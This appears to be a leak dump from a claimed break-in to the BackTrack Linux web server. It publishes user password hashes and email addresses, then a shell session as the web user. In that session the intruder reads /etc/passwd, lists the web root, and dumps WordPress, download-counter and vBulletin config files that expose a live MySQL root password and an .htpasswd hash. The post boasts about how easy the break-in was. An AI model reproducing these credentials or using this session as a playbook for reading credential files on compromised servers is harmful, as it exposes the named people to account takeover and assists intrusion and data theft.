h00die:$P$Behl/g/GHQo5zxciUMgjPPzu7ZI8nO/::[email protected]
MaXe:$P$B6PKmgTlcm5L5kpysXfksmEmRfMy6U.::[email protected]
marked_doe:$P$By1rR96ByDsyil/yQa79qBE/A7nbOA1:marked_doe:[email protected]
code0wnz:$P$Bw1OuJHHzMtUBd8oSjmFoQYKtzjaC..:code0wnz:[email protected]
Dr_IDE:$P$BR.ReeHZDabreI8G0D5NARv8oY6SOP/::[email protected]
Sud0:$P$BqovGmeqOSCzsHFso9q4goSZ4hkWbK1: :[email protected]
TecR0c:$P$BXoaJm6vL1VKJWz.K3m1M.XXVoXU9K/::[email protected]
kripthor:$P$BpUEGtZ3PvzfYotKDvvRA1AU9U4.iq1:kripthor:[email protected]
ryp:$P$BwQ3FGe9q7spL3vkhxTyYMBkL4UGOQ.::[email protected]
fdisk:$P$Blv3X9wG6b/Yo3SDi22/nIJ34t2jGi/::[email protected]
root-boy:$P$BWq8dOxSe/HKG/kE3cXpGyAOgR6F.n1:root-boy:[email protected]

,_._._._._._._._|____________________________________________________ 
|_|_|_|_|_|_|_|_|___________________________________________________/ 
  ~ backtrack ~ !                                                     
                                                                      
Since we already tapped into exploit-db and their server lies  in  the
same subnet  with  backtrack,  we  decided  to  check  out  their  mad
security. Backtrack is run by muts, the same guy who also  administers
exploit-db, so no wonder why it was super easy to get a shell...      


$ uname -a
Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux

$ id
uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0

$ alias ls="ls -la"

$ ls
total 110
dr-xr-xr-x.  25 root root  4096 Dec  7 08:42 .
dr-xr-xr-x.  25 root root  4096 Dec  7 08:42 ..
-rw-r--r--.   1 root root     0 Dec  7 08:42 .autofsck
drwx------.   2 root root  4096 Dec 10 03:40 backup
dr-xr-xr-x.   2 root root  4096 Nov 29 19:59 bin
dr-xr-xr-x.   5 root root  1024 Dec  7 08:41 boot
drwxr-xr-x.  17 root root  3580 Dec  7 08:43 dev
drwxr-xr-x.  66 root root  4096 Dec  7 08:42 etc
drwxr-xr-x.   3 root root  4096 Aug 14 20:50 home
dr-xr-xr-x.   9 root root  4096 Aug 11 04:01 lib
dr-xr-xr-x.   9 root root 12288 Nov 29 20:00 lib64
drwx------.   2 root root 16384 Aug 11 02:01 lost+found
drwxr-xr-x.   2 root root  4096 Aug 11 04:42 maint
drwxr-xr-x.   2 root root  4096 Aug 25  2009 media
drwxr-xr-x.   2 root root  4096 Aug 25  2009 mnt
drwxr-xr-x.   2 root root  4096 Aug 25  2009 opt
dr-xr-xr-x. 160 root root     0 Dec  7 08:42 proc
drwxr-xr-x.   5 root root  4096 Dec  3 17:16 recovery
dr-xr-x---.   4 root root  4096 Dec 10 08:50 root
dr-xr-xr-x.   2 root root 12288 Nov 29 19:59 sbin
drwxr-xr-x.   7 root root     0 Dec  7 08:42 selinux
drwxr-xr-x.   2 root root  4096 Aug 25  2009 srv
drwxr-xr-x.  13 root root     0 Dec  7 08:42 sys
drwxrwxrwt.   4 root root  4096 Dec 10 14:08 tmp
drwxr-xr-x.  14 root root  4096 Aug 11 02:03 usr
drwxr-xr-x.  20 root root  4096 Aug 14 20:45 var


$ cat /etc/issue
Fedora release 12 (Constantine)
Kernel \r on an \m (\l)

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin
sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:494:Apache:/var/www:/sbin/nologin
mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash
ossec:x:500:500::/var/ossec:/sbin/nologin
ossecm:x:501:500::/var/ossec:/sbin/nologin
ossecr:x:502:500::/var/ossec:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin

$ cd
/var/www/html/

$ ls
total 90224
drwxr-xr-x. 13 apache apache     4096 Dec  9 12:21 .
drwxr-xr-x.  6 root   root       4096 Aug 18 10:30 ..
-rw-r--r--.  1 apache apache     4183 Dec  5 16:50 .htaccess
-rw-r--r--.  1 apache apache     1156 Aug 11 03:17 HT
-rw-r--r--.  1 apache apache     2233 Aug 11 03:17 HT-ORIG
-rw-r--r--.  1 apache apache  1526525 Nov 11 14:01 IMG_0585.JPG
drwxr-xr-x.  2 apache apache     4096 Aug 11 03:16 ads
-rw-r--r--.  1 apache apache   125832 Nov 19 12:18 bootsplash.jpg
-rw-r--r--.  1 apache apache   754444 Aug 11 03:16 bt-nsa.png
-rw-r--r--.  1 apache apache   757498 Aug 11 03:16 bt-nsa2.png
-rw-r--r--.  1 apache apache    81597 Aug 11 03:16 bt4-final-vm.zip.torrent
-rw-r--r--.  1 apache apache    60094 Aug 11 03:16 bt4-final.iso.torrent
-rw-r--r--.  1 apache apache       44 Aug 11 03:16 bt4r1.txt
-rw-r--r--.  1 root   root     686248 Nov 23 10:47 bt4r2.png
-rw-r--r--.  1 apache apache   160728 Aug 11 03:16 btfail.png
-rw-r--r--.  1 apache apache      476 Aug 11 03:16 collapsible_ad.html
-rwxr-xr-x.  1 apache apache 13397784 Aug 11 03:16 d.bin
-rw-r--r--.  1 apache apache      121 Aug 11 03:16 d.lic
-rw-r--r--.  1 apache apache 12844822 Aug 11 03:16 d32.bin
drwxr-xr-x.  2 apache apache     4096 Aug 11 03:16 documents
-rw-r--r--.  1 apache apache     3342 Aug 11 03:16 down.php
-rw-r--r--.  1 apache apache     4158 Aug 11 03:16 download-orig.php
-rw-r--r--.  1 apache apache     4945 Nov 22 11:38 download.php
-rw-r--r--.  1 apache apache    15125 Aug 11 03:16 error.php
-rw-r--r--.  1 apache apache   137383 Aug 11 03:16 example-2.jpg
-rw-r--r--.  1 apache apache     1150 Aug 11 03:16 favicon.ico
drwxr-xr-x. 21 apache apache     4096 Nov 22 18:56 forums
-rw-r--r--.  1 apache apache    87176 Aug 11 03:17 google.png
-rw-r--r--.  1 apache apache       53 Aug 11 03:17 googled6c4817aa45e0032.html
-rw-r--r--.  1 apache apache       23 Aug 11 03:17 googlehostedservice.html
-rw-r--r--.  1 apache apache  1978856 Sep 17 08:06 hola.jpg
-rw-r--r--.  1 apache apache  2264271 Sep 17 08:12 hola1.jpg
-rw-r--r--.  1 apache apache  2197361 Sep 17 08:15 hola2.jpg
-rw-r--r--.  1 apache apache   315306 Aug 11 03:17 hola22.png
-rw-r--r--.  1 apache apache   169202 Aug 11 03:17 hola23.png
drwxr-xr-x.  8 apache apache     4096 Nov 21 16:38 images
-rw-r--r--.  1 apache apache        3 Aug 11 03:17 index.html
-rw-r--r--.  1 apache apache      397 Dec  9 12:20 index.php
-rw-r--r--.  1 apache apache   321196 Nov 19 15:06 kanji.png
-rw-r--r--.  1 apache apache   147841 Sep  4 12:37 knock-0.5.tar.gz
-rw-r--r--.  1 apache apache    15410 Dec  9 12:20 license.txt
-rw-r--r--.  1 apache apache 48404480 Nov 14 15:53 mediawiki-1.16.0.tar
-rw-r--r--.  1 apache apache    13946 Aug 11 03:17 nv-xorg.conf
-rw-r--r--.  1 apache apache  1382400 Oct 26 10:38 oiopub-direct.tar
-rw-r--r--.  1 apache apache  1508471 Aug 11 03:17 p2270016.jpg
-rw-r--r--.  1 apache apache  1636957 Aug 11 03:17 p2280018.jpg
drwxr-xr-x.  2 apache apache     4096 Nov 22 11:46 patches
-rw-r--r--.  1 apache apache      582 Nov 22 11:21 r2.php
-rw-r--r--.  1 apache apache     9120 Dec  9 12:20 readme.html
-rw-r--r--.  1 apache apache      712 Nov 10 22:27 s.php
-rw-r--r--.  1 apache apache       63 Aug 11 03:17 show.dud.php
-rw-r--r--.  1 apache apache      801 Aug 11 03:17 show.original.php
-rw-r--r--.  1 apache apache       31 Aug 11 03:17 show.php
-rw-r--r--.  1 apache apache      601 Nov 10 22:28 show.stats.working.php
-rw-r--r--.  1 apache apache    38971 Dec  7 23:23 sitemap.xml
-rw-r--r--.  1 apache apache     2485 Dec  7 23:23 sitemap.xml.gz
drwxr-xr-x.  3 apache apache     4096 Aug 11 03:17 slider
-rw-r--r--.  1 apache apache   714372 Aug 11 03:17 spot-the-release.png
-rw-r--r--.  1 apache apache     1536 Aug 11 03:17 stats.php
-rw-r--r--.  1 apache apache       33 Dec 10 03:34 stats.txt
-rw-r--r--.  1 apache apache    23660 Aug 11 03:17 style.css
-rw-r--r--.  1 apache apache        5 Aug 11 03:17 test.php
drwxr-xr-x.  2 apache apache     4096 Nov 22 09:22 torrents
drwxr-xr-x. 15 apache apache     4096 Nov 27 16:52 wiki
-rw-r--r--.  1 apache apache     4391 Dec  9 12:20 wp-activate.php
drwxr-xr-x.  8 apache apache     4096 Dec  5 08:12 wp-admin
-rw-r--r--.  1 apache apache    40284 Dec  9 12:20 wp-app.php
-rw-r--r--.  1 apache apache      220 Dec  9 12:20 wp-atom.php
-rw-r--r--.  1 apache apache      274 Dec  9 12:20 wp-blog-header.php
-rw-r--r--.  1 apache apache     3926 Dec  9 12:20 wp-comments-post.php
-rw-r--r--.  1 apache apache      238 Dec  9 12:20 wp-commentsrss2.php
-rw-r--r--.  1 apache apache     3173 Dec  9 12:20 wp-config-sample.php
-rw-r--r--.  1 apache apache     2696 Nov 22 19:32 wp-config.php
drwxr-xr-x.  9 apache apache     4096 Dec  9 12:21 wp-content
-rw-r--r--.  1 apache apache     1255 Dec  9 12:20 wp-cron.php
-rw-r--r--.  1 apache apache      240 Dec  9 12:20 wp-feed.php
drwxr-xr-x.  8 apache apache     4096 Aug 13 20:06 wp-includes
-rw-r--r--.  1 apache apache     2002 Dec  9 12:20 wp-links-opml.php
-rw-r--r--.  1 apache apache     2441 Dec  9 12:20 wp-load.php
-rw-r--r--.  1 apache apache    26059 Dec  9 12:20 wp-login.php
-rw-r--r--.  1 apache apache     7774 Dec  9 12:20 wp-mail.php
-rw-r--r--.  1 apache apache      487 Dec  9 12:20 wp-pass.php
-rw-r--r--.  1 apache apache      218 Dec  9 12:20 wp-rdf.php
-rw-r--r--.  1 apache apache      316 Dec  9 12:20 wp-register.php
-rw-r--r--.  1 apache apache      218 Dec  9 12:20 wp-rss.php
-rw-r--r--.  1 apache apache      220 Dec  9 12:20 wp-rss2.php
-rw-r--r--.  1 apache apache     9177 Dec  9 12:20 wp-settings.php
-rw-r--r--.  1 apache apache    18695 Dec  9 12:20 wp-signup.php
-rw-r--r--.  1 apache apache     3702 Dec  9 12:20 wp-trackback.php
-rw-r--r--.  1 root   root      99665 Nov 24 00:52 wtfff.png
-rw-r--r--.  1 apache apache       85 Nov 20 13:43 x.gif
-rw-r--r--.  1 apache apache    95481 Dec  9 12:20 xmlrpc.php

$ cat wp-config.php
<?php
/** Enable W3 Total Cache **/
define('WP_CACHE', true); // Added by W3 Total Cache

/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
 * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'blog');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', '234hi2u3d98as7d23kuh');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * WordPress Localized Language, defaults to English.
 *
 * Change this to localize WordPress.  A corresponding MO file for the chosen
 * language must be installed to wp-content/languages. For example, install
 * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
 * language support.
 */
define ('WPLANG', '');

/* That's all, stop editing! Happy blogging. */

/** WordPress absolute path to the Wordpress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

$ cat show.php
<?php
include 'stats.txt';
?>
$ cat stats.txt
BackTrack 4 - 4916323 downloads

cat download.php
<?php

// DO NOT CHANGE THIS FILE WITHOUT TALKING TO MUTS FIRST> EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!!

function getRealIpAddr()
{
    if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
    {
      $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
    {
      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
      $ip=$_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}

$ip=getRealIpAddr();

$username="root";
$password="234hi2u3d98as7d23kuh";
$database="counter";

function choose($iso)
{

 $num = Rand (1,5);
 switch ($num)
 {
  case 1:
  $link="ftp://ftp.uio.no/pub/security/backtrack/$iso";
  break;

  case 2:
  $link="http://ftp.uio.no/pub/security/backtrack/$iso";
  break;

  case 3:
  $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
                break;

  case 4:
  $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
                break;

  case 5:
  $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
                break;

//  case 6:
//  $link="http://moon.backtrack-linux.org/downloads/$iso";
//  break;


 }


return $link;

}


$version=$_GET["fname"];

if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm")))

{
 echo "This page cannot be accessed directly.";
 exit;
}

if ($version=="bt4r2")
{

        $iso="bt4-r2.iso";
        $link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

        header( "Location: $link ");
        exit;
}


if ($version=="bt4r2vm")
{

        $iso="bt4-r2-vm.tar.bz2";
        $link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

        header( "Location: $link ");
        exit;
}



if ($version=="bt4f")
{

 $iso="bt4-final.iso";
 $link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

 header( "Location: $link ");
 exit;
}

elseif ($version=="bt4fvm")
{
 $iso="bt4-final-vm.zip";
 $link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

 header( "Location: $link ");
 exit;
}

elseif ($version=="bt4r1")
{
 $iso="bt4-r1.iso";
 $link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

 header( "Location: $link ");
 exit;
}

elseif ($version=="bt4r1vm")
{
 $iso="bt4-r1-vm.tar.bz2";
 $link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

 header( "Location: $link ");
 exit;
}

elseif ($version=="bt4pf")
{
 $iso="bt4-pre-final.iso";
 $link=choose($iso);

mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();

 header( "Location: $link ");
 exit;
}

elseif ($version=="bt4b")
{
 $iso="bt4-beta.iso";
 $link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
 header( "Location: $link ");
 exit;
}

elseif ($version=="bt4bvm")
{
 $iso="bt4-beta-vm-6.5.1.rar";
 $link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
 header( "Location: $link ");
 exit;
}

elseif ($version=="bt3")
{
 $iso="bt3-final.iso";
 $link=choose($iso);
mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
mysql_query($query);
mysql_close();
 header( "Location: $link ");
 exit;
}

else
{
 exit;
}

?>


$ cat s.php
<?php


$username="root";
$password="234hi2u3d98as7d23kuh";
$database="counter";



mysql_connect("localhost",$username,$password);
@mysql_select_db($database) or die( "Unable to select database");
$query = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4f\"";
$query2 = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt4fvm\"";
$result=mysql_query($query);
$result2=mysql_query($query2);
$row2 = mysql_fetch_array($result2, MYSQL_ASSOC);
$row = mysql_fetch_array($result, MYSQL_ASSOC);
$numrows1 = $row['numrows'];
$numrows2 = $row2['numrows'];
mysql_close();

$total= round(($numrows1 + $numrows2) * 1.4);

echo "BackTrack 4 Final - $total unique downloads";

?>

$ cd wiki

$ ls

total 700
drwxr-xr-x. 15 apache apache   4096 Nov 27 16:52 .
drwxr-xr-x. 13 apache apache   4096 Dec  9 12:21 ..
-rw-r--r--.  1 apache apache     23 Nov 14 16:01 .htpasswd
-rw-r--r--.  1 apache apache  17997 Apr  5  2006 COPYING
-rw-r--r--.  1 apache apache   2073 Jul 27 07:29 CREDITS
-rw-r--r--.  1 apache apache     76 Jul 27  2009 FAQ
-rw-r--r--.  1 apache apache 392287 Mar 12  2010 HISTORY
-rw-r--r--.  1 apache apache     96 Nov 14 16:01 HT
-rw-r--r--.  1 apache apache   4138 Apr 18  2008 INSTALL
-rw-r--r--.  1 apache apache   5469 Nov 28 16:45 LocalSettings.php
-rw-r--r--.  1 apache apache   3649 Nov 11  2008 README
-rw-r--r--.  1 apache apache  58431 Jul 28 03:11 RELEASE-NOTES
-rw-r--r--.  1 apache apache    648 May  7  2009 StartProfiler.sample
-rw-r--r--.  1 apache apache  13307 Mar 25  2010 UPGRADE
drwxr-xr-x.  2 root   root     4096 Nov 27 16:53 adsense
-rw-r--r--.  1 apache apache   4707 Feb 15  2010 api.php
-rw-r--r--.  1 apache apache     25 Feb  3  2008 api.php5
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 bin
-rw-r--r--.  1 apache apache   8436 Nov 21 14:24 bt-wiki.png
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 cache
drwxr-xr-x.  2 apache apache   4096 Nov 14 15:58 config
drwxr-xr-x.  4 apache apache   4096 Jul 28 03:16 docs
drwxr-xr-x.  4 apache apache   4096 Nov 28 16:44 extensions
drwxr-xr-x. 12 apache apache   4096 Nov 23 12:36 images
-rw-r--r--.  1 apache apache   4031 Oct 14  2009 img_auth.php
-rw-r--r--.  1 apache apache     31 Feb  3  2008 img_auth.php5
drwxr-xr-x. 16 apache apache   4096 Jul 28 03:16 includes
-rw-r--r--.  1 apache apache   4329 Jan  1  2010 index.php
-rw-r--r--.  1 apache apache     28 Feb  3  2008 index.php5
drwxr-xr-x.  4 apache apache   4096 Jul 28 03:16 languages
drwxr-xr-x. 13 apache apache  12288 Nov 22 12:55 maintenance
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 math
-rw-r--r--.  1 apache apache   3054 Mar 21  2009 opensearch_desc.php
-rw-r--r--.  1 apache apache     39 Mar  3  2008 opensearch_desc.php5
-rw-r--r--.  1 apache apache    174 Feb  3  2010 php5.php5
-rw-r--r--.  1 apache apache   8821 Jul 27 03:40 profileinfo.php
-rw-r--r--.  1 apache apache    383 Mar 21  2009 redirect.php
-rw-r--r--.  1 apache apache     31 Feb  3  2008 redirect.php5
-rw-r--r--.  1 apache apache     89 Feb  3  2010 redirect.phtml
drwxr-xr-x.  2 apache apache   4096 Jul 28 03:16 serialized
-rwxrwxrwx.  1 root   root     6816 Nov 23 18:29 sitemap.xml
drwxr-xr-x.  9 apache apache   4096 Nov 28 14:12 skins
-rw-r--r--.  1 apache apache   4905 Mar  8  2010 thumb.php
-rw-r--r--.  1 apache apache     29 Feb  3  2008 thumb.php5
-rw-r--r--.  1 apache apache   1347 Nov  5  2008 trackback.php
-rw-r--r--.  1 apache apache     32 Mar 16  2009 trackback.php5
-rw-r--r--.  1 apache apache     86 Feb  3  2010 wiki.phtml

$ cat .htpasswd
edbadmin:YE8mle4nG1Z.c

cd ..
cat forums/includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.0.0 Patch Level 1
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ©2000-2010 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to    |
| MySQL, you will need to email your webhost because we   |
| cannot tell you the correct values for the variables    |
| in this file.                                           |
\*-------------------------------------------------------*/

 // ****** DATABASE TYPE ******
 // This is the type of the database server on which your vBulletin database will be located.
 // Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
 // for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';

 // ****** DATABASE NAME ******
 // This is the name of the database where your vBulletin will be located.
 // This must be created by your webhost.
$config['Database']['dbname'] = 'forums';

 // ****** TABLE PREFIX ******
 // Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';

 // ****** TECHNICAL EMAIL ADDRESS ******
 // If any database errors occur, they will be emailed to the address specified here.
 // Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = '[email protected]';

 // ****** FORCE EMPTY SQL MODE ******
 // New versions of MySQL (4.1+) have introduced some behaviors that are
 // incompatible with vBulletin. Setting this value to "true" disables those
 // behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;



 // ****** MASTER DATABASE SERVER NAME AND PORT ******
 // This is the hostname or IP address and port of the database server.
 // If you are unsure of what to put here, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

 // ****** MASTER DATABASE USERNAME & PASSWORD ******
 // This is the username and password you use to access MySQL.
 // These must be obtained through your webhost.
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = '234hi2u3d98as7d23kuh';

 // ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
 // This option allows you to turn persistent connections to MySQL on or off.
 // The difference in performance is negligible for all but the largest boards.
 // If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;



 // ****** SLAVE DATABASE CONFIGURATION ******
 // If you have multiple database backends, this is the information for your slave
 // server. If you are not 100% sure you need to fill in this information,
 // do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;



 // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
 // This setting allows you to change the name of the folders that the admin and
 // moderator control panels reside in. You may wish to do this for security purposes.
 // Please note that if you change the name of the directory here, you will still need
 // to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'admincphaha';
$config['Misc']['modcpdir'] = 'modcphaha';

 // Prefix that all vBulletin cookies will have
 // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';

 // ******** FULL PATH TO FORUMS DIRECTORY ******
 // On a few systems it may be necessary to input the full path to your forums directory
 // for vBulletin to function normally. You can ignore this setting unless vBulletin
 // tells you to fill this in. Do not include a trailing slash!
 // Example Unix:
 //   $config['Misc']['forumpath'] = '/home/users/public_html/forums';
 // Example Win32:
 //   $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';



 // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
 // The users specified here will be allowed to view the admin log in the control panel.
 // Users must be specified by *ID number* here. To obtain a user's ID number,
 // view their profile via the control panel. If this is a new installation, leave
 // the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '1';

 // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
 // The users specified here will be allowed to remove ("prune") entries from the admin
 // log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '1';

 // ****** USERS WITH QUERY RUNNING PERMISSIONS ******
 // The users specified here will be allowed to run queries from the control panel.
 // See the above entries for more information on the format.
 // Please note that the ability to run queries is quite powerful. You may wish
 // to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';

 // ****** UNDELETABLE / UNALTERABLE USERS ******
 // The users specified here will not be deletable or alterable from the control panel by any users.
 // To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '';

 // ****** SUPER ADMINISTRATORS ******
 // The users specified below will have permission to access the administrator permissions
 // page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1,2';

 // ****** DATASTORE CACHE CONFIGURATION *****
 // Here you can configure different methods for caching datastore items.
 // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
 // vB_Datastore_APC - to use APC
 // vB_Datastore_XCache - to use XCache
 // vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';

 // ******** DATASTORE PREFIX ******
 // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
 // than one set of forums installed on your host, you *may* need to use a prefix
 // so that they do not try to use the same variable within the cache.
 // This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';

 // It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i]   = '127.0.0.1';
$config['Misc']['memcacheport'][$i]      = 11211;
$config['Misc']['memcachepersistent'][$i] = true;
$config['Misc']['memcacheweight'][$i]   = 1;
$config['Misc']['memcachetimeout'][$i]   = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/

// ****** The following options are only needed in special cases ******

 // ****** MySQLI OPTIONS *****
 // When using MySQL 4.1+, MySQLi should be used to connect to the database.
 // If you need to set the default connection charset because your database
 // is using a charset other than latin1, you can set the charset here.
 // If you don't set the charset to be the same as your database, you
 // may receive collation errors.  Ignore this setting unless you
 // are sure you need to use it.
// $config['Mysqli']['charset'] = 'utf8';

 // Optionally, PHP can be instructed to set connection parameters by reading from the
 // file named in 'ini_file'. Please use a full path to the file.
 // Example:
 // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';

// Image Processing Options
 // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| # Downloaded: 22:25, Sat Jan 9th 2010
|| # CVS: $RCSfile$ - $Revision: 32878 $
